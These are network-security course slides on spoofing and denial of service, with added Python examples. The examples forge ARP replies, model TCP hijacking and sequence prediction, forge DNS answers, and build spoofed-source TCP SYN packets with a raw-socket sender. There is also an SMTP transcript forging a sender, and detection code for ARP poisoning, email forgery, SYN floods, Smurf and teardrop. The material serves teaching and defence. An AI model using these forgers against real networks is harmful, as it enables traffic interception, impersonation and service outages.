ECE 4112 - Internetwork Security 1
Address Spoofing and Denial of Service
• Agenda
  MAC modification
  Address Resolution Protocol trickery
  IP address spoofing
  TCP session hijacking
  Domain name spoofing
  Email spoofing (not in lab)
  Denial of service
IP Spoofing and Denial of Service Lab Exercises
• Medium Access Control (MAC) address spoofing
  Windows XP MAC modification
  Linux MAC modification
• IP spoofing
  From Windows: wINJECT
  From Linux: fraggle.c
• Domain Name System spoofing
  dsniff tool
• Denial of service
  datapool tool
  synful, teardrop, udpflood
The Ethernet Frame - IEEE 802.3
• Frame layout: destination MAC (6 bytes), source MAC (6 bytes), type/length (2 bytes), payload, frame check sequence (4 bytes).
• The destination and source MAC addresses are the fields modified for spoofing; no field in the frame authenticates them.
MAC modification/Spoofing
• Change the MAC on a host (cloning)
  Linux: ifconfig (hw ether option)
  Windows: network adapter settings
• Creating link layer packets (spoofing)
  libnet (API)
  Linkcat (tool: netcat for the link layer)
Modifying Windows XP Network Interface
Modifying Windows XP Network Interface (continued)
Modifying Linux Network Interface
Address Resolution Protocol (ARP)
• Method for finding a host's Ethernet (MAC) address from its IP address
• The requester broadcasts "who has this IP address?"; the owner replies with its MAC
• Hosts maintain a cache of answers to avoid frequent requests
ARP Cache Poisoning
• Man in the Middle (MitM) attack
  Session stealing
  Packet/data injection
• Beat the switch: a switch delivers a frame only to the port that owns the destination MAC, so a sniffer on another port sees nothing. Poisoning the victims' ARP caches (or flooding the switch's address table with macof) makes their traffic reach the attacker as it would on a hub.
Arpspoof Example
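The slide above showed an arpspoof run. As an added example (not from the slides, and not arpspoof's own code), the Python below builds the same kind of ARP reply by hand, feeds it to a model of a victim's ARP cache, and then applies the arpwatch-style check that catches it. The MAC and IP addresses are constructed and nothing is put on the wire.

```python
"""Ethernet + ARP frame construction and an ARP cache poisoning walk-through.

Added example (not from the ECE 4112 slides). Addresses and MACs below are
constructed for illustration; nothing is sent on a network.
"""
import struct

ETH_P_ARP = 0x0806            # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_frame(dst_mac, src_mac, op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II header (dst, src, type) followed by a 28-byte ARP body.

    src_mac is whatever we put in the header: a spoofed source MAC is just a
    different 6 bytes here, which is why link-layer spoofing is trivial.
    """
    ethernet = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)   # hw=Ethernet, proto=IPv4, lengths, opcode
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return ethernet + arp


def parse_arp_frame(frame):
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETH_P_ARP:
        raise ValueError(f"not ARP: ethertype 0x{ethertype:04x}")
    return {
        "eth_dst": mac_str(frame[0:6]),
        "eth_src": mac_str(frame[6:12]),
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


class ArpCache:
    """Minimal model of a host's ARP cache with the classic, unvalidated update rule."""

    def __init__(self):
        self.table = {}

    def learn(self, frame):
        arp = parse_arp_frame(frame)
        # Most stacks accept a reply whether or not they asked for it (and many
        # also update on a request). That is the hole arpspoof uses.
        if arp["op"] in (ARP_REQUEST, ARP_REPLY):
            self.table[arp["sender_ip"]] = arp["sender_mac"]

    def lookup(self, ip):
        return self.table.get(ip)


def detect_arp_conflicts(frames, known_bindings):
    """arpwatch-style check: flag any ARP whose sender IP is bound to a different MAC."""
    alerts = []
    for frame in frames:
        arp = parse_arp_frame(frame)
        expected = known_bindings.get(arp["sender_ip"])
        if expected and expected != arp["sender_mac"]:
            alerts.append((arp["sender_ip"], expected, arp["sender_mac"]))
    return alerts


# Constructed LAN: gateway, victim, attacker (all addresses are made up).
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "aa:aa:aa:aa:aa:01"
VICTIM_IP, VICTIM_MAC = "10.0.0.20", "bb:bb:bb:bb:bb:20"
ATTACKER_MAC = "cc:cc:cc:cc:cc:99"


def poisoning_walkthrough():
    cache = ArpCache()
    # 1. Legitimate exchange: the gateway answers the victim's request.
    legit = build_arp_frame(VICTIM_MAC, GATEWAY_MAC, ARP_REPLY,
                            GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    cache.learn(legit)
    before = cache.lookup(GATEWAY_IP)
    # 2. Poison: the attacker claims the gateway's IP with its own MAC
    #    (what `arpspoof -t 10.0.0.20 10.0.0.1` keeps sending).
    poison = build_arp_frame(VICTIM_MAC, ATTACKER_MAC, ARP_REPLY,
                             ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    cache.learn(poison)
    after = cache.lookup(GATEWAY_IP)
    alerts = detect_arp_conflicts([legit, poison], {GATEWAY_IP: GATEWAY_MAC})
    return before, after, alerts


if __name__ == "__main__":
    print(poisoning_walkthrough())
```

After the poisoned reply the victim's cache maps the gateway's IP to the attacker's MAC, so every frame for the gateway now goes to the attacker; arpspoof re-sends the reply every few seconds so the entry never ages out.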
Network and Transport Layers
• Internet Protocol (IP)
• Internet Control Message Protocol (ICMP)
• Transmission Control Protocol (TCP)
• User Datagram Protocol (UDP)
• TCP session hijacking
Internet Protocol (IP)
• IP provides a best-effort way to route datagrams from source to destination
• Source address, destination address: network number and host number
• IP spoofing: change or disguise source address
IPv4 header (each row is one 32-bit word):
  Version | IHL | Type of service | Total length
  Identification | Flags (DF, MF) | Fragment offset
  Time to live | Protocol | Header checksum
  Source address
  Destination address
  Options (0 or more words)
IP Spoofing
• Non-blind attacks
  Attacker and target on the same subnet
  Reply traffic can be sniffed
• Blind attacks
  Attacker and target on different subnets
  Reply traffic cannot be seen by the attacker
  Attacker must be able to predict replies
IP Spoofing
• Attacks made possible by IP spoofing include
  Denial of Service (DoS)
  Session hijacking
  Man in the middle
• To take over a TCP stream, the sequence and acknowledgement numbers in use must be sniffed (non-blind) or predicted (blind).
Transmission Control Protocol (TCP)
• Source and destination ports
• Sequence and acknowledgement numbers
• Reliability: checksum (detects corruption, not tampering; anyone forging a segment simply recomputes it)
TCP header (each row is one 32-bit word):
  Source port | Destination port
  Sequence number
  Acknowledgement number
  TCP header length | (reserved) | URG ACK PSH RST SYN FIN | Window size
  Checksum | Urgent pointer
  Options (0 or more 32-bit words)
  Data (optional)
Transmission Control Protocol (TCP)
• Control flags (the six one-bit fields in the header)
  URG - Urgent
  ACK - Acknowledge
  PSH - Push
  RST - Reset
  SYN - Synchronize (opens a connection; a flood of SYNs can fill a server's half-open connection table)
  FIN - Finish
Transmission Control Protocol (TCP)
• TCP connection initiation: three-way handshake
  Host 1 -> Host 2: SYN (SEQ=x)
  Host 2 -> Host 1: SYN (SEQ=y, ACK=x+1)
  Host 1 -> Host 2: ACK (SEQ=x+1, ACK=y+1)
Session Hijacking
• Session hijacking attacks are based on sniffing and IP spoofing
  The attacker monitors packets between Alice and Bob
  The attacker injects spoofed traffic with a source IP address of Alice
• Figure: Alice has a telnet session to Bob across the network; the attacker, also on the network, injects a segment claiming "Hi, I am Alice".
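As an added example (not from the slides), the model below walks the three-way handshake with explicit SEQ/ACK bookkeeping, then shows both hijacking cases: the non-blind attacker who has sniffed Alice's segments derives the one SEQ that Bob will accept and desynchronises the real session, and the blind attacker who can only succeed if the server's initial sequence numbers are predictable. Host names, ISNs and the telnet commands are constructed; PredictableIsn is a deliberately weak model of an old stack, not any particular real one.

```python
"""Three-way handshake bookkeeping and what a hijacker must know to inject.

Added example, not from the ECE 4112 slides. Hosts, ISNs and the telnet
traffic are a constructed model (no sockets); the receiver accepts only the
exact in-order sequence number, which is enough to show the point.
"""
import random

MOD = 1 << 32


class TcpEndpoint:
    def __init__(self, name, isn):
        self.name = name
        self.snd_nxt = isn          # next sequence number we will send
        self.rcv_nxt = None         # next sequence number we expect
        self.received = []

    def deliver(self, seq, ack, payload):
        """Accept a segment only if it is exactly the next expected one."""
        if self.rcv_nxt is None or seq != self.rcv_nxt:
            return False
        self.received.append(payload)
        self.rcv_nxt = (self.rcv_nxt + len(payload)) % MOD
        return True


def handshake(a, b):
    """SYN (SEQ=x) / SYN (SEQ=y, ACK=x+1) / ACK (SEQ=x+1, ACK=y+1)."""
    x = a.snd_nxt
    b.rcv_nxt = (x + 1) % MOD
    y = b.snd_nxt
    a.rcv_nxt = (y + 1) % MOD
    a.snd_nxt = (x + 1) % MOD
    b.snd_nxt = (y + 1) % MOD
    return x, y


def send(sender, receiver, payload):
    seq, ack = sender.snd_nxt, sender.rcv_nxt
    if receiver.deliver(seq, ack, payload):
        sender.snd_nxt = (seq + len(payload)) % MOD
        return True
    return False


def hijack_demo():
    """Non-blind case: the attacker sniffs Alice's segments to Bob."""
    alice = TcpEndpoint("alice", random.getrandbits(32))
    bob = TcpEndpoint("bob", random.getrandbits(32))
    handshake(alice, bob)
    sniffed = []
    for chunk in (b"ls\r\n", b"cat notes\r\n"):
        sniffed.append((alice.snd_nxt, len(chunk)))   # what a sniffer sees
        send(alice, bob, chunk)
    # Next usable SEQ is last SEQ + last length; ACK is Bob's next SEQ.
    last_seq, last_len = sniffed[-1]
    forged_seq = (last_seq + last_len) % MOD
    injected = bob.deliver(forged_seq, alice.rcv_nxt, b"echo pwned\r\n")
    # Alice's next genuine segment reuses a SEQ Bob has already consumed, so
    # it is rejected: the real session is now desynchronised.
    alice_still_accepted = send(alice, bob, b"exit\r\n")
    return injected, alice_still_accepted, bob.received


class PredictableIsn:
    """Model of an old stack whose ISN grows by a fixed step per connection
    (the weakness behind blind spoofing; modern stacks randomise the ISN)."""
    STEP = 64000

    def __init__(self, start=1000):
        self.current = start

    def next(self):
        self.current = (self.current + self.STEP) % MOD
        return self.current


def blind_prediction(isn_source):
    """Blind case: open one real connection to learn y, then predict the y the
    server will pick for the spoofed connection whose SYN-ACK we never see."""
    probe, server = TcpEndpoint("probe", 0), TcpEndpoint("server", isn_source.next())
    _, y_probe = handshake(probe, server)
    predicted = (y_probe + PredictableIsn.STEP) % MOD
    server_again = TcpEndpoint("server", isn_source.next())  # next connection's ISN
    return predicted == server_again.snd_nxt


if __name__ == "__main__":
    print(hijack_demo())
    print("blind prediction works:", blind_prediction(PredictableIsn()))
```

The rejected "exit" segment is the ACK-storm situation a real hijack produces: Alice and Bob keep acknowledging numbers the other side does not expect, which is why tools like hunt resynchronise or simply kill the original client.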
DNS Spoofing
• Causes name resolution to return an incorrect IP address
• In our lab, the dsniff tool (dnsspoof) is used to accomplish this
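What dnsspoof does on the wire, as an added example (not from the slides and not dsniff's code): parse a sniffed query, and answer it with a reply that copies the transaction ID and question but carries the attacker's address. The query, ID and addresses are constructed.

```python
"""Forged DNS reply of the kind dnsspoof sends.

Added example, not from the ECE 4112 slides. The query, the transaction ID and
the spoofed address are constructed; nothing is sent on the network.
"""
import struct

A_RECORD, IN_CLASS = 1, 1


def encode_name(name):
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg, off):
    """Read a name at msg[off], following one compression pointer if present."""
    labels = []
    while True:
        n = msg[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0 == 0xC0:                       # pointer to an earlier name
            ptr = ((n & 0x3F) << 8) | msg[off]
            off += 1
            labels.append(decode_name(msg, ptr)[0])
            break
        labels.append(msg[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def build_query(txid, name, qtype=A_RECORD):
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, 1 question
    return header + encode_name(name) + struct.pack("!HH", qtype, IN_CLASS)


def parse_query(msg):
    txid = struct.unpack("!H", msg[:2])[0]
    qname, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"txid": txid, "qname": qname, "qtype": qtype, "qclass": qclass,
            "question": msg[12:off + 4]}


def forge_reply(query, spoofed_ip, ttl=300):
    """Answer the sniffed query with our own A record, copying its ID and
    question so the victim's resolver cannot tell it from the real answer."""
    q = parse_query(query)
    header = struct.pack("!HHHHHH", q["txid"], 0x8180, 1, 1, 0, 0)  # QR, RD, RA, NOERROR
    answer = b"\xc0\x0c" + struct.pack("!HHIH", A_RECORD, IN_CLASS, ttl, 4)
    answer += bytes(int(o) for o in spoofed_ip.split("."))
    return header + q["question"] + answer


def parse_reply(msg):
    txid, _flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    off += 4                                       # skip QTYPE/QCLASS
    answers = []
    for _ in range(ancount):
        name, off = decode_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype == A_RECORD:
            answers.append((name, ".".join(str(b) for b in rdata)))
    return {"txid": txid, "qname": qname, "answers": answers}


def resolver_accepts(query, reply):
    """All a stub resolver can check: the reply's ID and question match the
    outstanding query (the source port, not modelled here, is the other check).
    On a shared segment the attacker saw the query, so it knows both, and the
    first reply to arrive wins the race against the real server."""
    q, r = parse_query(query), parse_reply(reply)
    return r["txid"] == q["txid"] and r["qname"] == q["qname"]


if __name__ == "__main__":
    query = build_query(0x1A2B, "www.example.com")          # constructed
    forged = forge_reply(query, "10.0.0.66")                 # attacker's host
    print(resolver_accepts(query, forged), parse_reply(forged)["answers"])
```

The reply is accepted purely because ID and question match; on a switched network the attacker first needs ARP poisoning (previous slides) to see the query at all, which is why the lab chains the two dsniff tools.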
DSniff
• Collection of tools for network auditing and penetration testing.
• Tools included
  arpspoof, dnsspoof, dsniff, filesnarf, macof
  mailsnarf, msgsnarf, tcpkill, tcpnice, urlsnarf
  webspy, sshmitm, webmitm
• All kinds of attacks can be run, e.g.
  Password sniffing
  Message and file capture
  URL capture
  Man-in-the-middle
• Lab exercises
  DNS spoofing
Email Spoofing
• Email spoofing is effective because most people don't take the time to check message headers.
• An email's true origin can be further obfuscated by forging extra "Received:" lines beneath the genuine ones.
• To let the recipient verify the origin, email can be cryptographically signed.
Email Spoofing
• Email spoofing is a form of social engineering.
• Email spoofing is also used by spammers to make them harder to track.
• A forged email can be detected by close inspection of its headers.
• Classic SMTP on port 25 has no authentication step: anyone who can connect may issue MAIL FROM with any address and send mail.
Email Spoofing (Not in Lab Assignment)
telnet mail.xyz.gatech.edu 25
220 sark.xyz.gatech.edu ESMTP Sendmail 8.12.10/8.12.8; Mon, 1 Dec 2003 04:05:00 (EST)
HELO abc4883.com
250 sark.xyz.gatech.edu Hello ece-237-37.abc.gatech.edu [130.207.237.37], pleased to meet you
MAIL FROM: <[email protected]>
250 2.1.0 <[email protected]>... Sender ok
RCPT TO: <[email protected]>
250 2.1.5 <[email protected]>... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
Greetings from abc4883!
.
250 2.0.0 hAUMOh6c005386 Message accepted for delivery
QUIT
221 2.0.0 sark.xyz.gatech.edu closing connection
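Added example (not from the slides): what the message sent in that transcript looks like once sark.xyz.gatech.edu has stamped its Received: line, and the header checks the slides recommend, run in Python. The message texts are constructed to match the transcript (Sendmail records both the HELO name and the real connecting host); the From:/To: addresses are invented, and OBFUSCATED adds a forged Received: line of the kind described earlier.

```python
"""Header inspection of the spoofed message from the SMTP transcript above.

Added example, not from the ECE 4112 slides. The messages are constructed to
look like what Sendmail would have recorded for that session; the From:/To:
addresses are invented (the real ones are not on the page) and the second
message adds a fabricated Received: line as the slide describes.
"""
import re
from email import message_from_string
from email.utils import parseaddr

OUR_MTA = "sark.xyz.gatech.edu"

SPOOFED = """Received: from abc4883.com (ece-237-37.abc.gatech.edu [130.207.237.37])
\tby sark.xyz.gatech.edu (8.12.10/8.12.8) with SMTP id hAUMOh6c005386;
\tMon, 1 Dec 2003 04:05:00 -0500 (EST)
From: Someone <someone@abc4883.com>
To: victim@xyz.gatech.edu
Subject: Greetings

Greetings from abc4883!
"""

# The same message with an extra hop forged below the genuine one (MTAs prepend
# their Received: line, so the bottom one is the one the sender controls).
FORGED_HOP = """Received: from mail.abc4883.com (mail.abc4883.com [203.0.113.5])
\tby relay.abc4883.com with ESMTP id 1234; Mon, 1 Dec 2003 03:59:00 -0500
"""
OBFUSCATED = SPOOFED.replace("From: Someone", FORGED_HOP + "From: Someone", 1)

# A genuine internal message for contrast.
LEGIT = """Received: from mail.abc.gatech.edu (mail.abc.gatech.edu [130.207.1.1])
\tby sark.xyz.gatech.edu (8.12.10/8.12.8) with ESMTP id hAUMOh6c005387;
\tMon, 1 Dec 2003 04:10:00 -0500 (EST)
From: bob@abc.gatech.edu
To: victim@xyz.gatech.edu
Subject: Lab

See you at the lab.
"""

# Sendmail's "from HELO (rDNS [ip]) by host" form; rDNS may be absent.
HOP_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[\d.]+)\]\)\s+by\s+(?P<by>\S+)")


def hops(raw):
    """Received: lines top to bottom: index 0 is the last hop (our MTA)."""
    parsed = []
    for value in message_from_string(raw).get_all("Received", []):
        m = HOP_RE.search(" ".join(value.split()))
        parsed.append(m.groupdict() if m else {"raw": value})
    return parsed


def domain(host):
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def inspect(raw, our_mta=OUR_MTA):
    """Trust only the hop our own MTA recorded; compare what the client said
    (HELO, From:) with what the MTA saw (rDNS, IP); then check the hand-off chain."""
    chain = hops(raw)
    trusted = next((h for h in chain if h.get("by") == our_mta), None)
    if trusted is None:
        return ["no Received: line from our own MTA"]
    findings = []
    rdns = trusted.get("rdns") or trusted["ip"]
    if domain(trusted["helo"]) != domain(rdns):
        findings.append(f"HELO {trusted['helo']} does not match connecting host {rdns} [{trusted['ip']}]")
    from_addr = parseaddr(message_from_string(raw).get("From", ""))[1]
    from_dom = from_addr.rpartition("@")[2]
    if domain(from_dom) != domain(rdns):
        findings.append(f"From: domain {from_dom} is not the domain of the submitting host {rdns}")
    for upper, lower in zip(chain, chain[1:]):
        if lower.get("by") not in (upper.get("helo"), upper.get("rdns")):
            findings.append(f"chain break: {lower.get('by')} claims to have handed off to us, "
                            f"but {upper.get('helo')} connected")
    return findings


if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED), ("obfuscated", OBFUSCATED), ("legit", LEGIT)):
        print(name, inspect(raw))
```

The only trustworthy line is the one your own MTA wrote; everything below it was supplied by the sender, which is why the check anchors on that hop and treats the rest as claims to be cross-checked rather than facts.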
Raw Sockets
• Let the application bypass the kernel's transport implementation and hand complete IP packets (or, with packet sockets, link-layer frames) to the network directly
• Develop new protocols or build upon existing ones
• Programming difference:
  sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
  Manually build the necessary headers (with the IP_HDRINCL socket option set, the IP header too; otherwise the kernel prepends its own)
• Requires super user access (root, or CAP_NET_RAW on Linux)
• Not implemented the same across all platforms
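The header diagrams on the IP and TCP slides, and the "manually build the necessary headers" step here, as an added example (not from the slides, and not libnet's code): a Python builder for an IPv4 datagram carrying a TCP SYN with a spoofed source, with both checksums computed and verified. Addresses and port numbers are constructed; send_raw() is the raw-socket hand-off and is not called, since it needs root and a network.

```python
"""IPv4 + TCP SYN built by hand with a spoofed source address.

Added example, not from the ECE 4112 slides. It performs the header
construction a raw socket (SOCK_RAW with IP_HDRINCL) or libnet leaves to the
programmer, and checks both checksums. Addresses are constructed test-net
values; send_raw() is shown for completeness and is never called here.
"""
import socket
import struct

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Constructed addresses (RFC 5737 documentation ranges).
SPOOFED_SRC = "198.51.100.7"   # the address we pretend to be
TARGET = "192.0.2.10"


def checksum(data):
    """RFC 1071 one's-complement sum of 16-bit words, folded and inverted."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src, dst, payload, proto=socket.IPPROTO_TCP, ttl=64, ident=0x1234):
    """20-byte IPv4 header (no options) in front of payload, checksum filled in."""
    ver_ihl = (4 << 4) | 5                    # version 4, IHL 5 words
    flags_frag = 0x4000                       # DF set, fragment offset 0
    hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, 20 + len(payload), ident,
                      flags_frag, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]
    return hdr + payload


def build_tcp(src, dst, sport, dport, seq, ack, flags, window=65535, data=b""):
    """20-byte TCP header plus data; the checksum covers the IPv4 pseudo-header too."""
    offset_flags = (5 << 12) | flags          # data offset 5 words, then the flag bits
    hdr = struct.pack("!HHIIHHHH", sport, dport, seq, ack, offset_flags, window, 0, 0)
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                         0, socket.IPPROTO_TCP, len(hdr) + len(data))
    csum = checksum(pseudo + hdr + data)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + data


def parse_ipv4_tcp(packet):
    """Decode the fields that matter for spoofing and verify both checksums
    (a valid header sums to zero under the same routine that produced it)."""
    ihl = (packet[0] & 0x0F) * 4
    ip, seg = packet[:ihl], packet[ihl:]
    sport, dport, seq, ack, offset_flags = struct.unpack("!HHIIH", seg[:14])
    pseudo = struct.pack("!4s4sBBH", ip[12:16], ip[16:20], 0, ip[9], len(seg))
    return {
        "src": socket.inet_ntoa(ip[12:16]),
        "dst": socket.inet_ntoa(ip[16:20]),
        "ttl": ip[8],
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": offset_flags & 0x3F,
        "ip_checksum_ok": checksum(ip) == 0,
        "tcp_checksum_ok": checksum(pseudo + seg) == 0,
    }


def spoofed_syn(sport=40000, dport=80, seq=0x1000):
    """A SYN that claims to come from SPOOFED_SRC. The SYN-ACK will go there,
    not to us: this is the blind case, so unless we can sniff that subnet or
    predict the target's ISN the handshake cannot be completed."""
    tcp = build_tcp(SPOOFED_SRC, TARGET, sport, dport, seq, 0, SYN)
    return build_ipv4(SPOOFED_SRC, TARGET, tcp)


def send_raw(packet, dst):
    """Hand the finished datagram to the kernel untouched (needs root / CAP_NET_RAW)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    try:
        s.sendto(packet, (dst, 0))
    finally:
        s.close()


if __name__ == "__main__":
    pkt = spoofed_syn()
    print(pkt.hex())
    print(parse_ipv4_tcp(pkt))
```

Nothing in either header prevents the forged source: the IP checksum only protects the header against corruption, and the TCP checksum is recomputed over the spoofed pseudo-header, so the target's stack sees a perfectly valid segment from 198.51.100.7.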
libnet
• Raw socket and link layer facilities
• Simplifies packet injection programming
  libnet_build_ipv4(ip_len, tos, id, frag, ttl, prot, sum, src_addr, dst_addr, payload, payload_s, l, ptag)
  libnet_autobuild_ipv4(len, prot, dst_addr, l);
  (src_addr and dst_addr are IPv4 addresses, not ports; passing sum = 0 makes libnet compute the checksum)
• Allows for prebuilding streams of packets
• Efficient mechanism for packet injection
• Portable solution for packet injection
Denial of Service
• Denial of service
  Easy to mount (script kiddies)
  Requires few computing resources
  Most common attack; deadly results
• Comes in various forms, e.g.
  Buffer overflow attack
  Teardrop attack
  SYN flood
  Smurf attack
Internet Control Message Protocol (ICMP)
• ICMP carries error reports and diagnostics for IP (ping is built on it).
• Each ICMP message is encapsulated in an IP packet.
  Message type            Description
  Destination unreachable Packet could not be delivered
  Time exceeded           Time to live field hit 0
  Parameter problem       Invalid header field
  Redirect                Teach a router about geography
  Echo request            Ask a machine if it is alive
  Echo reply              Yes, I am alive
Denial of Service
• Buffer overflow: send more data than the allotted buffer space, e.g. more than 256 characters in an email From field.
• Teardrop: takes advantage of IP fragmentation by sending fragments whose offsets overlap, which crashed the reassembly code of vulnerable stacks.
• SYN flood: floods the target with connection requests (SYNs), usually from spoofed sources, so its table of half-open connections fills and real clients are refused.
• Smurf: ICMP echo requests sent to a network's broadcast address with the victim's IP as the spoofed source, so every host on that network replies to the victim.
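As an added example (not from the slides, and not datapool's code), the detection side of the three network attacks above: functions that flag a SYN flood, a Smurf echo-request stream and teardrop-style overlapping fragments when run over constructed packet summaries. The record format, the addresses and the threshold are assumptions.

```python
"""Detection logic for the three network DoS patterns above, run over
constructed packet summaries.

Added example, not from the ECE 4112 slides. The records imitate what a sniffer
or flow log would yield (timestamp, addresses, TCP flags, ICMP type, fragment
fields); all addresses are documentation ranges and the threshold is an
assumption to tune for a real network.
"""
from collections import defaultdict

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10
ECHO_REQUEST = 8


def tcp(ts, src, sport, dst, dport, flags):
    return {"ts": ts, "proto": "tcp", "src": src, "sport": sport,
            "dst": dst, "dport": dport, "flags": flags}


def icmp(ts, src, dst, icmp_type):
    return {"ts": ts, "proto": "icmp", "src": src, "dst": dst, "icmp_type": icmp_type}


def frag(ts, src, dst, ip_id, offset, length, more):
    # offset is in 8-byte units as in the IP header; length is this fragment's payload
    return {"ts": ts, "proto": "udp", "src": src, "dst": dst, "ip_id": ip_id,
            "frag_offset": offset, "frag_len": length, "more": more}


SERVER, VICTIM, BCAST = "192.0.2.10", "198.51.100.99", "192.0.2.255"

SAMPLE = (
    # one legitimate connection that completes its handshake
    [tcp(0.00, "198.51.100.5", 40000, SERVER, 80, SYN),
     tcp(0.01, SERVER, 80, "198.51.100.5", 40000, SYN | ACK),
     tcp(0.02, "198.51.100.5", 40000, SERVER, 80, ACK)]
    # SYN flood: twelve SYNs from spoofed sources, none ever acknowledged
    + [tcp(0.10 + i * 0.01, f"203.0.113.{i}", 1000 + i, SERVER, 80, SYN) for i in range(12)]
    # Smurf: echo requests to the directed broadcast with the victim as source
    + [icmp(0.50 + i * 0.01, VICTIM, BCAST, ECHO_REQUEST) for i in range(3)]
    # Teardrop: second fragment starts inside the first (offset 3*8 = 24 < 36)
    + [frag(0.70, "203.0.113.200", SERVER, 0x4242, 0, 36, True),
       frag(0.70, "203.0.113.200", SERVER, 0x4242, 3, 4, False)]
)


def detect_syn_flood(packets, threshold=10):
    """Destinations holding at least `threshold` half-open connections: a SYN
    from (src, sport, dport) that is never followed by an ACK from the same tuple."""
    half_open = defaultdict(set)
    for p in packets:
        if p["proto"] != "tcp":
            continue
        key = (p["src"], p["sport"], p["dport"])
        if p["flags"] & SYN and not p["flags"] & ACK:
            half_open[p["dst"]].add(key)
        elif p["flags"] & ACK and not p["flags"] & SYN:
            half_open[p["dst"]].discard(key)      # third handshake step seen
    return {dst: len(keys) for dst, keys in half_open.items() if len(keys) >= threshold}


def detect_smurf(packets, broadcast_addrs):
    """Echo requests aimed at a broadcast address; the source is the real victim."""
    return [(p["src"], p["dst"]) for p in packets
            if p["proto"] == "icmp" and p["icmp_type"] == ECHO_REQUEST
            and p["dst"] in broadcast_addrs]


def detect_teardrop(packets):
    """Datagrams (src, dst, IP id) with fragments whose byte ranges overlap."""
    seen = defaultdict(list)
    alerts = set()
    for p in packets:
        if "frag_offset" not in p:
            continue
        key = (p["src"], p["dst"], p["ip_id"])
        start = p["frag_offset"] * 8
        end = start + p["frag_len"]
        if any(start < e and end > s for s, e in seen[key]):
            alerts.add(key)
        seen[key].append((start, end))
    return sorted(alerts)


if __name__ == "__main__":
    print("SYN flood:", detect_syn_flood(SAMPLE))
    print("Smurf:", detect_smurf(SAMPLE, {BCAST}))
    print("Teardrop:", detect_teardrop(SAMPLE))
```

The SYN-flood counter keys on half-open connections rather than on SYN rate, so a busy but healthy server is not flagged; the Smurf check needs the list of your own broadcast addresses, and the teardrop check is the same overlap test a hardened reassembler performs before accepting a fragment.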
Denial of Service
• Tool to be used in lab: Datapool
• Customizable script with the capability to run 106 different DoS attacks (including the ones discussed)
• Can run attacks against multiple IPs and learns about the vulnerabilities of each
• IP spoofing is used to disguise the source of the attack
References: WWW
• OSI Model: RAD Data Communications
• libnet (packetfactory.net)
• Raw Socket Programming (mixter.void.ru)
• Paketto (www.doxpara.com/paketto)
• Dsniff (naughty.monkey.org/~dugsong/dsniff)
References: Books
• Computer Networks, Third Edition. Andrew Tanenbaum, Prentice-Hall, 1996.
• Counter Hack. Ed Skoudis, Prentice-Hall, 2002.
• TCP/IP Illustrated, Volume 1. W. Richard Stevens, Addison-Wesley, 1994.